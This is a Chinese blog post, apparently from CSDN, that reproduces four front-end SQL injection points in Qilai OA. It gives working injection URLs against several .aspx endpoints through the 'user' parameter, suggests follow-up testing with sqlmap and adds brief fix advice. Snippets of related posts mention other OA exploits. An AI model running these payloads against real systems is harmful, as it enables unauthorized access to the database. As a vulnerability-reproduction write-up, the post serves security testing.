启莱OA系统SQL注入复现渗透测试

最新推荐文章于 2024-05-09 09:30:12 发布
最新推荐文章于 2024-05-09 09:30:12 发布
阅读量2.9k 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试 安全漏洞 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/118084482
版权

简介

启莱OA的是协同OA办公系统,在多个领域均有应用。企业厂商暂不详,但被爆出前台存在4个sql注入点。

漏洞复现

使用url拼接一下路由
POC1

/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1

POC2

/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1

POC3

/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1

POC4

/client/GetUser.aspx?user=' and @@version>0--

如果回显如下 则可能存在sql注入

sql注入回显

后续可使用sqlmap进行测试检查

修复建议

设置拦截 限制访问

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关
烽铃子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微OA8前台sql注入1
08-08
cmd=getSelectAllId&sql=***注入点 在getdata.jsp中,直接将request对象交给weaver.hrm.common.Ajax
红队攻防文库
众生度尽,方证菩提
08-23 295
各家兴便是天下大同
Goby漏洞更新 jeecg-boot 未授权SQL注入漏洞(CVE-2024-1454)
2301_77033672的博客
04-17 250
攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!企业Web应用程序的Java低代码平台JEECG-Boot(v3.5.0)最新未经授权的SQL注入。JeecgBoot是一款基于代码生成器的低代码开发平台。
渗透测试面试常见问题
WWWFFFX的博客
03-25 1061
日志审计系统能够通过主被动结合的手段,实时且不间断的采集用户网络中不同厂商的安全设备,网络设备,主机,操作系统以及各种应用系统产生的海量日志信息,并将这些信息汇集到审计中心,进行集中化存储,备份,查询,审计,告警,响应,并出具丰富的报表报告,获悉全网的整体安全运行态势,同时满足等保关于安全管理中心的日志保存时间大于6个月的要求。产品主要部署在网站服务器的前方。通过特征提取和分块检索技术进行模式匹配来达到过滤,分析,校验网络请求包的目的,在保证正常网络应用功能的同时,隔绝或者阻断无效或者非法的攻击请求。
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0
siu~
08-29 890
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0的设计中旨是为了帮助各位师傅在渗透测试和挖洞中以及攻防演练中能够快速对OA系统进行快速定位进行漏洞检测和利用.,目前已实现20款OA系统漏洞检测和利用,共133个漏洞.听说day一打一个准,也欢迎各位师傅补充漏洞和反馈误报,我们将积极作出调整和完善.
《WEB安全渗透测试》(16)利用Python编写漏洞批量检测POC
午夜观星河
10-31 2471
《WEB安全渗透测试》(16)利用Python编写漏洞批量检测POC ECShop的user.php文件中的display函数的模板变量可控,导致注入,配合注入可达到远程代码执行。攻击者无需登录等操作,可直接远程把webshell写入服务器。$back_act变量来源于HTTP_REFERER,我们可以控制它。Ecshop使用了 php 模版引擎 smarty ,该引擎有两个基本的函数assign()、display()。...
启莱OA messageurl.aspx SQL注入
众生度尽,方证菩提
08-30 359
​子曰:“不患人之不己知,患不知人也。”
启莱OA CloseMsg.aspx SQL注入
众生度尽,方证菩提
08-29 396
子贡曰:“贫而无谄,富而无骄,何如?”子曰:“可也。未若贫而乐,富而好礼者也。” 子贡曰:“《诗》云:‘如切如磋,如琢如磨。’其斯之谓与?”子曰:“赐也,始可与言《诗》已矣!告诸往而知来者也。”
SQL注入(SQL injection)
l_010的博客
06-21 510
SQL注入(SQL injection)
对某泛微OA的一次渗透测试_利用方式三
afei001
06-07 585
后来才知道,是可以getshell的,看了表哥们的文章才知道,泛微对于堆叠查询做了过滤,过滤了;、--+等特殊字符。原来SQLserver堆叠注入并不需要;,所以SQLmap是无法直接--os-shell的。可惜当时并不知道不需要;就把洞交了。又少了好几个W。唉。
蓝凌(Landray)OA漏洞常见RCE
最新发布
heike_Ch的博客
05-09 333
背景是由于一次和友商共同的渗透项目测试中,其中一个系统使用了蓝凌OA,但当时由于一些原因觉得版本挺新应该是打了补丁的故在测试中没有仔细遍历复现蓝凌OA的历史常见RCE漏洞,后续对比了友商的报告发现别人测的两个RCE,故统一做个poc积累学习,混个眼熟防止下次渗透或攻防时漏掉。
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
OA系统常用SQL语句
11-12
涉及OA办公所有SQL语句,具体包含:人事管控、公文档案、日常办公、流程管理、OA互联、部门主页、我的办公室(远程传阅)
java开发得oa系统源码-Pentest:渗透测试
06-05
java开发得oa系统源码免责声明 此页面上描述的工具技术和程序应仅用于经批准的渗透测试、CTF 和其他合法黑客挑战网站。 与本网站所含材料相关的任何行为或活动均由用户自行负责,网站所有者与此无关。 如果任何个人...
通达OA sql注入漏洞.zip
08-24
已实现漏洞验证脚本
启莱OA treelist.aspx SQL注入
众生度尽,方证菩提
08-31 319
子曰:“为政以德,譬如北辰,居其所,而众星共之。”
SQL Injection(SQL注入)介绍及SQL Injection攻击检测工具
热门推荐
周公(周金桥)的专栏
08-06 1万+
1.关于SQL Injection 迄今为止,我基本没有看到谁写出一篇很完整的文章,或者说很成熟的解决方案(能做到 的人肯定很多,问题是没有流传开来,很遗憾) 我简单的说几点,希望启发大家思考,起到抛砖引玉的作用 一、SQL Injection的原理 SQL Injection的实现方法和破坏作用有很多,但万变不离其宗,其原理可以概括为一句话 :SQL Injection就是向服务器端提交事先
通达OA系统11.2漏洞
qq_50854662的博客
12-02 4528
以通达OA系统11.2版本为案例的Web渗透
记一次完整的渗透测试
LiuWang0314的博客
05-21 2042
目录前言掉坑起因(通达OA前台任意用户登录)掉坑过程一(上传webshell问题)掉坑过程二(cmdshell提权问题)如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 本次渗透测试过程大概是这样的:通达OA前台任意用户登录-上传webshell-获取相关信息-提权c
泛微oa系统9.00漏洞复现
05-02
泛微OA是一款广泛使用的办公自动化软件,在其9.00版本中,存在一个漏洞漏洞编号为CVE-2021-29623,该漏洞允许攻击者未经身份验证就可以访问系统中的重要文件。攻击者可以通过向系统发送恶意请求,来获取管理员账户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值